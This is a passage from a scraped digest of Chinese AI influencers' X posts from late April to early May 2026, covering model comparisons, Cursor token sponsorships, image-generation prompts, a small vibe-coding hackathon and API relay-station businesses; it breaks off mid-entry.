目前已经有4位伙伴提交了作品,挺有意思的,都是一些小工具,估计就一两个小时就完成了\n[原文链接](https://x.com/bozhou_ai/status/2050092103565496369)\n\n**[2026-04-30T08:40:01+00:00]**\n> Pinned: 五一做点不一样的。 我和乌云 @Pluvio9yte 搞了一个小型 AI 黑客松👇 主题很简单: 用 AI 解决一个每天浪费 10 分钟的小问题 不用炫技,不用大项目 能用、有效、有感觉就行 3 个赛道: 赛道一:省时间 把重复劳动自动化,比如:日报生成、聊天记录转待办、会议纪要整理、消息摘要、资料归类。 赛道二:省脑力 帮人理解和决策,比如:PDF 问答、信息摘要、内容对比、评…\n[原文链接](https://x.com/bozhou_ai/status/2049770737175789619)\n\n**[2026-04-30T05:25:46+00:00]**\n> 月底仔细算了一下4月份的收入,算是达到了月入万刀了,但是SaaS 出海贡献的几乎为零😂 主要收入为主业+自媒体+培训+中转站+其他副业,加在一起收入超过了一万刀了 目前最大头的还是主业,其次是自媒体,还需要继续努力,早日彻底摆脱主业,实现副业月入万刀\n[原文链接](https://x.com/bozhou_ai/status/2049721852420108329)\n\n**[2026-04-30T01:29:33+00:00]**\n> 我还有十二万积分没用\n[原文链接](https://x.com/bozhou_ai/status/2049662409263272136)\n\n**[2026-04-29T10:33:21+00:00]**\n> Warp 昨晚开源了。 GitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。 Warp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。 几个观察: 第一,…\n[原文链接](https://x.com/bozhou_ai/status/2049436870963085429)\n\n**[2026-04-29T10:32:33+00:00]**\n> MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。 cyrilXBT 整理的清单,分四类。 【基础】 1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法 https://cs.nyu.edu/~mohri/mlbook/ 2. Mathematics for Mach…\n[原文链接](https://x.com/bozhou_ai/status/2049436668663390575)\n\n**[2026-04-28T08:25:44+00:00]**\n> RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal …\n[原文链接](https://x.com/bozhou_ai/status/2049042369530777747)\n\n**[2026-04-28T07:51:43+00:00]**\n> memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的\n[原文链接](https://x.com/bozhou_ai/status/2049033808629129504)\n\n**[2026-04-28T07:04:22+00:00]**\n> x.com/i/article/204902020458…\n[原文链接](https://x.com/bozhou_ai/status/2049021892208521544)\n\n**[2026-04-28T00:26:49+00:00]**\n> 我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多\n[原文链接](https://x.com/bozhou_ai/status/2048921844175212590)\n\n**[2026-04-27T07:19:46+00:00]**\n> 我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好 现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了\n[原文链接](https://x.com/bozhou_ai/status/2048663377598452202)\n\n**[2026-04-27T05:49:10+00:00]**\n> RT by @bozhou_ai: 中文AI必关注12位高价值博主 AI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。 我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。 1. 摸鱼巨匠 @SunNeverSetsX AI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强 …\n[原文链接](https://x.com/bozhou_ai/status/2048640580004335669)\n\n**[2026-04-27T03:22:54+00:00]**\n> 之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。 一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。 它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广: AI 端:Claude Code…\n[原文链接](https://x.com/bozhou_ai/status/2048603768250585231)\n\n**[2026-04-27T01:15:43+00:00]**\n> 人生第一次录播客,我们和cell老师一起聊聊中转站的那些事\n[原文链接](https://x.com/bozhou_ai/status/2048571760698949641)\n\n**[2026-04-26T13:15:51+00:00]**\n> RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》 @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。 2. 0xAA @0xAA_Science 北…\n[原文链接](https://x.com/bozhou_ai/status/2048390603030032670)\n\n**[2026-04-26T13:00:17+00:00]**\n> GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵\n[原文链接](https://x.com/bozhou_ai/status/2048386685399142532)\n\n**[2026-04-25T09:18:55+00:00]**\n> RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了! 这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。 现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博…\n[原文链接](https://x.com/bozhou_ai/status/2047968587902820543)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/20477384398237330…\n[原文链接](https://x.com/bozhou_ai/status/2047891848908472433)\n\n**[2026-04-25T01:17:42+00:00]**\n> Cursor大善人,我也已经领到了,在X上获得的最大一笔收入\n[原文链接](https://x.com/bozhou_ai/status/2047847486430286317)\n\n---\n\n### ✅ @lxfater — 铁锤人(20 条)\n\n**[2026-05-01T15:47:13+00:00]**\n> Apple Support App发布打包进了Claude.md 文件 看来苹果$1B 建 Apple Intelligence已经彻底报废,都用上Cluade code,哈哈哈\n[原文链接](https://x.com/lxfater/status/2050240636020732015)\n\n**[2026-05-01T12:21:36+00:00]**\n> 身体脆弱就会造成精神脆弱 精神脆弱就会导致效率低下\n[原文链接](https://x.com/lxfater/status/2050188888744804410)\n\n**[2026-04-30T17:01:35+00:00]**\n> GPT-5.5的网络攻击能力好像比前段时间吹上天的Mythos 没差这么多呀😂\n[原文链接](https://x.com/lxfater/status/2049896961382203667)\n\n**[2026-04-30T10:21:24+00:00]**\n> Claude code 对 OpenClaw的封杀已经丧心病狂了 最近,Theo(32 万粉的硅谷科技 YouTuber) 发现: 如果你最近的提交中有一个 JSON 文件提到了OpenClaw,Claude Code 要么会拒绝你的请求,要么会额外收费 现在Anthropic已经疯狂在毁开发者好感了 这种表里不一不是第一次了哈 之前 Claude Code 负责人 Boris Cherny,在…\n[原文链接](https://x.com/lxfater/status/2049796253471453564)\n\n**[2026-04-30T09:26:25+00:00]**\n> 说一下我是如何用AI工具的: Xai的Gork的搜索能力很强的,我经常使用来做搜索。 Cluade Desktop帮我填写表单,报税,偶尔做做知识库。Claude Code主要拿来走写点文字。 而Codex GPT-5.5 xhigh fast 才是你编程的最佳选择。\n[原文链接](https://x.com/lxfater/status/2049782414323388714)\n\n**[2026-04-30T07:34:19+00:00]**\n> 嘿嘿,有意思\n[原文链接](https://x.com/lxfater/status/2049754205641170992)\n\n**[2026-04-30T06:26:14+00:00]**\n> 如何用AI让美女联系任意瑜伽姿势呢? 下面一张图教你学会,更详细步骤在引用帖子里\n[原文链接](https://x.com/lxfater/status/2049737071300939914)\n\n**[2026-04-30T06:09:38+00:00]**\n> 快10w粉丝了,其实想发点总结的 但是我发现粉丝越多,自己的建议对别人就越没有用 在网上乱发建议,总有人会认为你没有资格干啥,好像你侮辱了他一样 以后多发点 适合普通人学习的 AI 小技巧好了🤗\n[原文链接](https://x.com/lxfater/status/2049732891937276350)\n\n**[2026-04-30T02:38:37+00:00]**\n> 醒来了,并没有😅\n[原文链接](https://x.com/lxfater/status/2049679788126912824)\n\n**[2026-04-29T14:50:44+00:00]**\n> 睡觉醒来,有 400 个好心人关注我,祝我破 10w 粉丝数吗?\n[原文链接](https://x.com/lxfater/status/2049501643071180855)\n\n**[2026-04-29T06:02:06+00:00]**\n> 用 GPT Image 2 赚钱,你想到几种方式? 我整理了5种,每种都有提示词,拿走能用 但还有一种方式不用自己会出图也能赚!! 有人进货四分钱,卖两毛,自己一张图都不出 闲鱼上已经有人在跑了 其余 5 种看图 完整提示词加自动化流程,请看引用文章👇\n[原文链接](https://x.com/lxfater/status/2049368609193926810)\n\n**[2026-04-29T03:28:30+00:00]**\n> R to @lxfater: 海报图片提示词 : 请生成一张随机的瑜伽宣传海报拼贴总图。 整体要求: 在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报 每张卡面尺寸随机设计铺满整张图 卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开 整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报 每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化 所有海报统一保持高级、专业、吸引…\n[原文链接](https://x.com/lxfater/status/2049329956153352499)\n\n**[2026-04-29T03:28:29+00:00]**\n> R to @lxfater: 如何使用Agent 模式 3 步: 选图像模式 选GPT-2-image 点 Agent 按钮 利用下面给的提示词,出了分镜图和人设图 接下来,利用分镜图和人设图,我们就可以控制人物动作啦!! 如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示) 得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了 多个视频就可以出系列的瑜伽动作 flo…\n[原文链接](https://x.com/lxfater/status/2049329950495310198)\n\n**[2026-04-29T03:28:28+00:00]**\n> 做内容运营,生图生视频,你现在还在跑好几个工具吗? 被朋友拉去做瑜伽图,搭了无数工作流 GPT Image 2 出来后,发现全废了 得重新规划一套,但这几天身体不舒服,没心思搞 随手把提示词扔进 flowith 试了一下 以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。 它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整 分镜图和人物图来生成出首末两张图片,用视频模式可…\n[原文链接](https://x.com/lxfater/status/2049329944052859141)\n\n**[2026-04-29T00:05:46+00:00]**\n> 看来草莓问题和洗车问题很经典了,ChatGPT都在测试\n[原文链接](https://x.com/lxfater/status/2049278935897186512)\n\n**[2026-04-28T13:31:04+00:00]**\n> Flowith出 GPT image 的生图Agent,真快呀 我赶紧试试,看看如何!!\n[原文链接](https://x.com/lxfater/status/2049119209502670864)\n\n**[2026-04-28T07:24:37+00:00]**\n> 说得太对了👍,牛逼\n[原文链接](https://x.com/lxfater/status/2049026986442707117)\n\n**[2026-04-28T06:55:56+00:00]**\n> x.com/i/article/204837140806…\n[原文链接](https://x.com/lxfater/status/2049019768456241273)\n\n**[2026-04-28T06:15:15+00:00]**\n> R to @lxfater: 来源: [1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17 [2] https://thenextweb.com/news/opena…\n[原文链接](https://x.com/lxfater/status/2049009528595685705)\n\n**[2026-04-28T06:14:44+00:00]**\n> Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法 2015 年,OpenAI 打着非营利的旗号成立 顶级研究员冲着使命感来,不要钱只要理想 Musk 看到了,砸了 3800 万进去 监管也没把它当商业公司盯 连 Musk 这种人都信了 但 CEO 在想另一件事 Altman 从 2014 年开始,在核聚变公司 Helion 买了股 2021 年一口气砸进去 3.7…\n[原文链接](https://x.com/lxfater/status/2049009402372313341)\n\n---\n\n### ✅ @berryxia — Berryxia(19 条)\n\n**[2026-05-01T14:50:44+00:00]**\n> 比起疯传的那个风格,我自己更偏爱这个风格。 Prompt: 「彩色潦草小狗线条风格绘制该图,童趣和doodle加入其中,务必使用毫无章法的绘制手法,凌乱和草率即可。』\n[原文链接](https://x.com/berryxia/status/2050226420681757102)\n\n**[2026-05-01T14:37:39+00:00]**\n> “ChatGPT,你陪我段时间了,我想看看你的样子。请成一张类似你iPhone随拍的照:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种“过于真实的随手一拍感\",就像是从口袋里拿出手机不小心按到的自拍。”\n[原文链接](https://x.com/berryxia/status/2050223126739665337)\n\n**[2026-05-01T14:29:58+00:00]**\n> 🚀 GameHub Evolution 正式上线! 架构全面大升级,Steam启动速度翻倍 + Epic Games 原生集成,手机玩PC大作体验直接起飞! 1. Steam Launch Boost:游戏启动速度提升数倍 2. Ultimate Virtual Controls + 配置分享:最强大自定义布局 + Share Code 一键分享 3. Epic Games 原生集成:直接访问海…\n[原文链接](https://x.com/berryxia/status/2050221193752637888)\n\n**[2026-05-01T13:36:12+00:00]**\n> 破案了,应该是美团的模型😄\n[原文链接](https://x.com/berryxia/status/2050207663892627601)\n\n**[2026-05-01T04:32:27+00:00]**\n> 我艹!这一波Codex+GPT2 真是成了! 直接可以来开发游戏了,而且只是用嘴! 一句话就可以搞起来,完整教程看藏师傅的教程👇\n[原文链接](https://x.com/berryxia/status/2050070823256654283)\n\n**[2026-05-01T00:52:14+00:00]**\n> R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/\n[原文链接](https://x.com/berryxia/status/2050015406140903487)\n\n**[2026-05-01T00:52:14+00:00]**\n> 🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层! @Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能! 1. 从文本/平面图直接生成精准 BREP CAD 模型 2. Three.js 实时渲染 + Google AI 驱动,全流程端到端 3.完整开源可用\n[原文链接](https://x.com/berryxia/status/2050015402647027808)\n\n**[2026-05-01T00:08:27+00:00]**\n> OpenRouter 又上了匿名新模型Owl Alpha! 1M 上下文,强大的工具调用能力! 猜猜他是谁家的哈哈😂\n[原文链接](https://x.com/berryxia/status/2050004383971282952)\n\n**[2026-05-01T00:00:12+00:00]**\n> 兄弟们!老马家的Grok Image终于…… Grok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中! 这是一款全能创意Agent,可在无限开放画布上独立创作。 Grok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。 只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭代: • 🎬 “生成一部 1 分钟电影级…\n[原文链接](https://x.com/berryxia/status/2050002308759695561)\n\n**[2026-04-30T23:56:28+00:00]**\n> 这个小哥读完Anthropic关于智能体AI的博客后,我梳理出一套心智模型,用来理解并拆解智能体AI架构的设计逻辑。 设定任务与目标 明确你希望AI智能体需要完成、达成的具体事项。 1. 编排层 Orchestration layer 相当于整套系统的控制面板,负责全局调度与流程统筹。 2. 智能体层 Agents layer 由多个专用/通用智能体组成,也就是多智能体分工协作架构。 3. 工具…\n[原文链接](https://x.com/berryxia/status/2050001371307646977)\n\n**[2026-04-30T23:46:56+00:00]**\n> 刚刚看到Claude Security 现已进入公测阶段!可以让Claude 帮你检查漏洞了啊! 目前已经内置于网页版的 Claude Code 中。 只需将其指向一个代码仓库,即可获得经过验证的漏洞发现结果,并在 正在编写代码的同一位置修复它们! 这个功能挺实用,什么时候可以直接cc里可以用。 地址:https://claude.com/product/claude-security\n[原文链接](https://x.com/berryxia/status/2049998972484567491)\n\n**[2026-04-30T23:41:23+00:00]**\n> 你看看大模型有多重? 这个挺有意思的😂\n[原文链接](https://x.com/berryxia/status/2049997574229446812)\n\n**[2026-04-30T23:34:02+00:00]**\n> Claude& Blender 🐮🍺\n[原文链接](https://x.com/berryxia/status/2049995723580850235)\n\n**[2026-04-30T23:30:42+00:00]**\n> 2026年你必须了解的6个大语言模型(LLM)知识库专业术语! (大多数团队至少缺失其中3项,这会让他们的智能AI代理付出代价) 1. LLM Knowledge Base 大语言模型知识库 一种能够让大语言模型接收原始资料、整理成结构化维基文档,并通过自有索引检索来回答问题的系统。安德烈·卡尔帕西曾为自己搭建过一套。该技术的难点在于:搭建一套能适配整个团队协同使用的知识库。 2. Contin…\n[原文链接](https://x.com/berryxia/status/2049994885764419789)\n\n**[2026-04-30T23:25:26+00:00]**\n> 兄弟们!嘴撸360 全景沉浸式体验小游戏!时代来了! 直接把这个Prompt丢给Flowith然后和Codex链接,图片直接整成360度场景图! Prompt:👇 1. 给图像Agent一个简单的提示,让它研究 AI 公司吉祥物并生成一个 360° 动物园。 2. 将全景图输入你的 Codex 以获得 3D 视图。\n[原文链接](https://x.com/berryxia/status/2049993558577619280)\n\n**[2026-04-30T23:21:37+00:00]**\n> 这几天使用Cursor 就发现在最后一步会有一个bug检测什么的的执行MCP一直提示我。 现在Curosr针对企业和Team版本有专门的针对安全漏洞做了审核的Agent!\n[原文链接](https://x.com/berryxia/status/2049992598639755395)\n\n**[2026-04-30T23:19:35+00:00]**\n> Gemini Embedding 2 已正式发布! RAG 知识库的应用又可以支持的更好了。\n[原文链接](https://x.com/berryxia/status/2049992087547130254)\n\n**[2026-04-30T23:17:56+00:00]**\n> 苹果内部正在使用一款名为 AFM Playground 的应用程序,它看起来与 ChatGPT 非常相似,但使用的是苹果的 Foundation Models。 不知道能搞出来个啥?\n[原文链接](https://x.com/berryxia/status/2049991672155750500)\n\n**[2026-04-30T23:16:18+00:00]**\n> 在这场访谈中,Karpathy 分享了他作为程序员在 AI 时代的亲身经历与深刻洞见。 他表示,2025 年 12 月成为他的个人转折点:AI 生成的代码从“有帮助但常需修改”转变为“直接可用”,他已记不清上一次亲自修改 AI 输出是什么时候,从此进入 “Vibe Coding”的状态。 Karpathy 将软件开发划分为三个阶段: Software 1.0 是传统显式代码编程,Software…\n[原文链接](https://x.com/berryxia/status/2049991262934380898)\n\n---\n\n### ✅ @Pluvio9yte — 雪踏乌云(19 条)\n\n**[2026-05-01T17:15:15+00:00]**\n> Damn!确实如此,所有AI编程工具都在卷模型智能,但现在满足基本的生产力了,转而让人崩溃的根本不是模型笨,是它每次开会话都失忆😅 AGENTS.md塞不下100万token的领域知识, RAG搜不到\"未知的未知\", 我自己维护Skills维护到想吐。 在公司里,新人入职花两周pair一下就能内化领域知识。 现在跟AI协作,每个新session都是\"新人第一天\"——而且是个永远不会转正的新人。这…\n[原文链接](https://x.com/Pluvio9yte/status/2050262789256859872)\n\n**[2026-05-01T17:07:00+00:00]**\n> 说个暴论,这个一百多万阅读帖子下的评论区里说\"Claude Code杀死了我的大脑\",其实90%搞反了因果🤯🤯🤯 我自己用CC大半年,直接把省下来的执行时间全砸在了架构设计上,脑子不但没退化反而比以前转得更快 以前写代码,80%时间花在执行(查文档、写代码、修bug),20%花在设计。现在执行交给Claude或者Codex了,只有两种结果: 1. 如果把省下的时间也一起交出去,只写prompt按…\n[原文链接](https://x.com/Pluvio9yte/status/2050260712858210516)\n\n**[2026-05-01T14:30:32+00:00]**\n> Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。 这话从地球上估值最高的私人公司 CEO嘴里说出来,确实值得认真看一下。 以下是几个核心信息: 1. Sam 说希望 OpenAI 做一个\"forever low margin\"(永远低利润率)的公司,类比 utility company(公用事业公…\n[原文链接](https://x.com/Pluvio9yte/status/2050221337424408733)\n\n**[2026-05-01T13:42:36+00:00]**\n> Theo 这条说得挺实在的:GPT 更聪明能帮你 unblock,但会以很蠢的方式卡住;Opus 会走一些很野的路径,但对你意图的理解确实更好。 他的结论是根据任务类型来回切换,而不是站队。 这跟我自己的体感基本一致。我现在日常编程也是双工具流: 1. 需要快速解决一个明确的技术问题、查 API 用法、debug 报错信息,GPT 响应快、知识面广,确实好用 2. 需要做一个比较复杂的重构、写一…\n[原文链接](https://x.com/Pluvio9yte/status/2050209273310060805)\n\n**[2026-05-01T12:25:12+00:00]**\n> 牛逼,今天刷到一篇帖子,然后成功用这个方法双开了微信👇 只需要将这段话发给Codex: 使用该项目 https://github.com/mcncarl/yichen-skills/tree/main/mac-wechat-dual-open 帮我安装微信双开。把它的图标换成蓝色。\n[原文链接](https://x.com/Pluvio9yte/status/2050189794324713656)\n\n**[2026-05-01T07:40:37+00:00]**\n> ⏺ OpenAI 官方发了一份 GPT-5.5 的 Prompt 编写指南,核心观点一句话概括:别再写又臭又长的 Prompt 了,告诉模型你要什么结果就行。 这份指南的思路挺有意思。以前大家写 Prompt 的习惯是\"手把手教\":先做A,再做B,然后比较C。 现在 OpenAI 官方的建议是:描述终点,而不是规定路线。 几个值得注意的点: 1. Outcome-First(结果导向): 不要写…\n[原文链接](https://x.com/Pluvio9yte/status/2050118179062743418)\n\n**[2026-05-01T04:39:44+00:00]**\n> ⏺ Sam Altman 这段话说得挺实在的:AI 的下一个大突破不是某个具体领域,而是人们意识到自己每天在电脑上浪费了多少时间。 简单说,大家以为 AI 的价值是\"帮你把某件事做得更好\",但 Altman认为真正的价值是\"帮你省掉那些根本不该做的事\"——在应用之间切换、复制粘贴、处理各种数字杂务。这些摩擦看着不起眼,但确实在不断打断心流。 这个观点我是认同的。说说自己的体验: 1. 以前写一篇…\n[原文链接](https://x.com/Pluvio9yte/status/2050072657618772226)\n\n**[2026-05-01T04:04:38+00:00]**\n> Anthropic这个BioMysteryBench直接把我对AI在硬核科学领域真实能力的认知彻底刷新了🤯 不是测评玩具benchmark,他们直接把Claude扔进99个来自真实研究的烂摊子生物信息学难题:原始DNA序列、临床样本那种messy到爆炸的数据,连PhD学生都要熬夜啃的开放谜题。 结果呢?5个领域专家都搞不定的23个硬骨头,Claude Mythos Preview直接干掉了约30…\n[原文链接](https://x.com/Pluvio9yte/status/2050063821377810451)\n\n**[2026-05-01T03:47:55+00:00]**\n> 卧槽,看完 Andrej Karpathy 在 Sequoia AI Ascent 2026 的最新访谈,我直接破防了🤯 他说:最近几个月,他作为程序员从来没有感觉这么“behind”过……不,是突然之间,他发现自己再也不落后了。12月前后,agentic tools 突然从“偶尔靠谱”变成了“离谱地靠谱”。 Karpathy说了三个阶段: Software 1.0:你写显式规则 Softwar…\n[原文链接](https://x.com/Pluvio9yte/status/2050059618043543563)\n\n**[2026-05-01T03:24:52+00:00]**\n> 这种平台有点意思,也见过好几个同类型的了。 互动加热的平台其实很大程度上依赖宣传和用户自传播。 见过两个逐渐杳无音讯的,目前唯一做起来的就是灯塔,看看这个平台会怎么样\n[原文链接](https://x.com/Pluvio9yte/status/2050053813802090671)\n\n**[2026-04-30T16:37:50+00:00]**\n> OpenAI 发了篇博客复盘自家模型一个挺有意思的\"口癖哥布林\"问题, 从 GPT-5.1 起,他们的模型莫名其妙开始爱用 goblin、gremlin 这些怪物词打比方,越往后越泛滥。 OpenAI 一路扒数据,定位到是训练 \"Nerdy\"(书呆子气)人格时,奖励信号意外地给\"用怪物词做比喻\"加了高分。 具体证据: 1. GPT-5.1 上线后,ChatGPT 里 goblin 用量涨了 17…\n[原文链接](https://x.com/Pluvio9yte/status/2049890985631768653)\n\n**[2026-04-30T16:18:34+00:00]**\n> A÷你认真的吗,38分钟打满了😅\n[原文链接](https://x.com/Pluvio9yte/status/2049886136580137378)\n\n**[2026-04-30T13:35:30+00:00]**\n> 补充一点我的经历:先拿到第一单,然后作为脱敏案例,后续拿下新客户也会更容易。\n[原文链接](https://x.com/Pluvio9yte/status/2049845097924342258)\n\n**[2026-04-30T13:01:33+00:00]**\n> 这篇文章说了很多小团队的协作经验 文里提到的一些模式我也深有体会。 曾经我也在工作之余兼职创业团队,也是toB,先打磨4个月,然后3个月赚了接近300万。 最后也是因为超预期在分钱上出了问题。 不过我没题主这么幸运,最后我一气之下离开了团队。如果在一开始就决定深入合作,找个律师过一眼合同还是挺重要的,这是我受到的教训。\n[原文链接](https://x.com/Pluvio9yte/status/2049836555171512759)\n\n**[2026-04-30T12:04:32+00:00]**\n> 这是我学习web3的一点点经验,目前刚接触不久,每一次学习和经验记录都会隔段时间记录下来,发一篇文章。 既是记录经验也是总结经验教训,欢迎各位一起围观下我的web3交易学习路径。\n[原文链接](https://x.com/Pluvio9yte/status/2049822206885286318)\n\n**[2026-04-30T12:00:57+00:00]**\n> x.com/i/article/204977806829…\n[原文链接](https://x.com/Pluvio9yte/status/2049821305072124254)\n\n**[2026-04-30T09:40:48+00:00]**\n> 欢迎大家来参加由http://dragoncode.codes举办的小黑客松 DragonCode是我和泊舟@bozhou_ai一起建立的Claude&Codex中转站,稳定运营了一段时间,也决定发起一些有意思的活动! 主题不难,围绕能够提效的小工具Vibe Coding即可 奖励: 🥇510元x1 🥈150元x2 🎁51 Dragon Code x15 参与方式见引用帖子:进群->填表>提交作品\n[原文链接](https://x.com/Pluvio9yte/status/2049786034502967620)\n\n**[2026-04-30T08:14:28+00:00]**\n> R to @Pluvio9yte: 帖子没了 可以去问grok GPT有什么促销活动\n[原文链接](https://x.com/Pluvio9yte/status/2049764309144879198)\n\n**[2026-04-30T06:49:00+00:00]**\n> 曾经国内数一数二日流水几十万的中转站88code 因拖欠巨额退款,已经秽土转生,正式换皮,改名为 Reclaude\n[原文链接](https://x.com/Pluvio9yte/status/2049742800049316039)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-05-01T17:33:05+00:00]**\n> What's harder for outsiders to understand is the falling of Deep Research inside @GeminiApp. On the other hand, Deep Research in @OpenAI is improving. Even so, nothing matches what Deep Research used…\n[原文链接](https://x.com/liuliu/status/2050267276893708414)\n\n**[2026-05-01T11:34:44+00:00]**\n> RT by @liuliu: 浏览器里跑 ASR 真的不是梦,一个完全没做啥优化的版本就能做到很高的准确率和推理速度了,估计我能优化到 0.04 这个速度(浏览器识别1秒音频需要 0.04秒时间)\n[原文链接](https://x.com/liuliu/status/2050177096505561140)\n\n**[2026-04-29T16:30:18+00:00]**\n> I think it is still unclear to me whether the gap between \"data in training set\" v.s. \"data in SKILL.md\" can be closed with further training on more SKILL.md, assuming latent reasoning will never mat…\n[原文链接](https://x.com/liuliu/status/2049526702334972397)\n\n---\n\n### ✅ @CuiMao — CuiMao(19 条)\n\n**[2026-05-01T18:31:06+00:00]**\n> 哈哈 @OpenAI 官号换掉了banner了 很明显,他们想再一次用这种画风重新走一遍当时4o宫崎骏现象级爆款。难,难啊。\n[原文链接](https://x.com/CuiMao/status/2050281878322811194)\n\n**[2026-05-01T16:08:50+00:00]**\n> 比我还抽象,刚才刷抖音,刷到个一个女的说,她自己用一个月的时间从什么都不懂的 AI 白痴,通过她的这套学习方法论,拿到了中厂的agent工程师 offer 😅😅😅😅,评论区一堆人求资料, 这个逼社会太疯狂了,我已经看不懂了。\n[原文链接](https://x.com/CuiMao/status/2050246075219693922)\n\n**[2026-05-01T15:54:12+00:00]**\n> I mainly focus on AI tech research and honestly, I’m not into crypto at all. Pls stop sending me DMs about collabs. Thanks🫡🫡🫡\n[原文链接](https://x.com/CuiMao/status/2050242393132396921)\n\n**[2026-05-01T09:31:03+00:00]**\n> RT by @CuiMao: I LOVE Deepseek-v4-flash, incredibly reliable and capable, logical. It's lacking in frontend but I have MiMo for that. I would recommend any company spending 100k+ a year on AI to purc…\n[原文链接](https://x.com/CuiMao/status/2050145968553709999)\n\n**[2026-05-01T09:15:45+00:00]**\n> 北京环球影城!✌️\n[原文链接](https://x.com/CuiMao/status/2050142119604691422)\n\n**[2026-04-30T14:47:31+00:00]**\n> R to @CuiMao: 本视频由seedance2生成,切勿当真!\n[原文链接](https://x.com/CuiMao/status/2049863222195572817)\n\n**[2026-04-30T12:45:32+00:00]**\n> 有没有深圳的,我准备搬到深圳住,有什么需要注意的和推荐的,求告知。\n[原文链接](https://x.com/CuiMao/status/2049832524067794961)\n\n**[2026-04-30T12:29:09+00:00]**\n> 老板,我们私底下做中转站的勾当彻底被曝光了 @DarioAmodei\n[原文链接](https://x.com/CuiMao/status/2049828401201246395)\n\n**[2026-04-30T09:09:57+00:00]**\n> 你这个朋友我认识\n[原文链接](https://x.com/CuiMao/status/2049778271714496808)\n\n**[2026-04-29T16:57:53+00:00]**\n> 全局md里面我之前只设置了CuiMao,没设定我的中文,所以老是乱翻译。下次干活先让他去市面上打听打听我的信息,然后再回来给我干活。事半功倍。\n[原文链接](https://x.com/CuiMao/status/2049533641563484523)\n\n**[2026-04-29T16:42:47+00:00]**\n> R to @CuiMao: github.com/Cuimao777/cuimao-…\n[原文链接](https://x.com/CuiMao/status/2049529840349614318)\n\n**[2026-04-29T16:42:24+00:00]**\n> RT by @CuiMao: Deepseek v4挺好的,接入claude code花了5.65块,把英语原版的30万字汉化成了EPUB,结果还有模有样的,借鉴了宝玉 @dotey 的Skill做了节省token的优化处理方案。评论区拿skill\n[原文链接](https://x.com/CuiMao/status/2049529746279796864)\n\n**[2026-04-29T13:28:23+00:00]**\n> 加了一些 AI 大 V 的微信才发现,原来,朋友圈都是孩子的日常,都是当爹的人了,孩子老大了。\n[原文链接](https://x.com/CuiMao/status/2049480920001114551)\n\n**[2026-04-29T07:55:14+00:00]**\n> Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!\n[原文链接](https://x.com/CuiMao/status/2049397079177592925)\n\n**[2026-04-29T07:44:33+00:00]**\n> 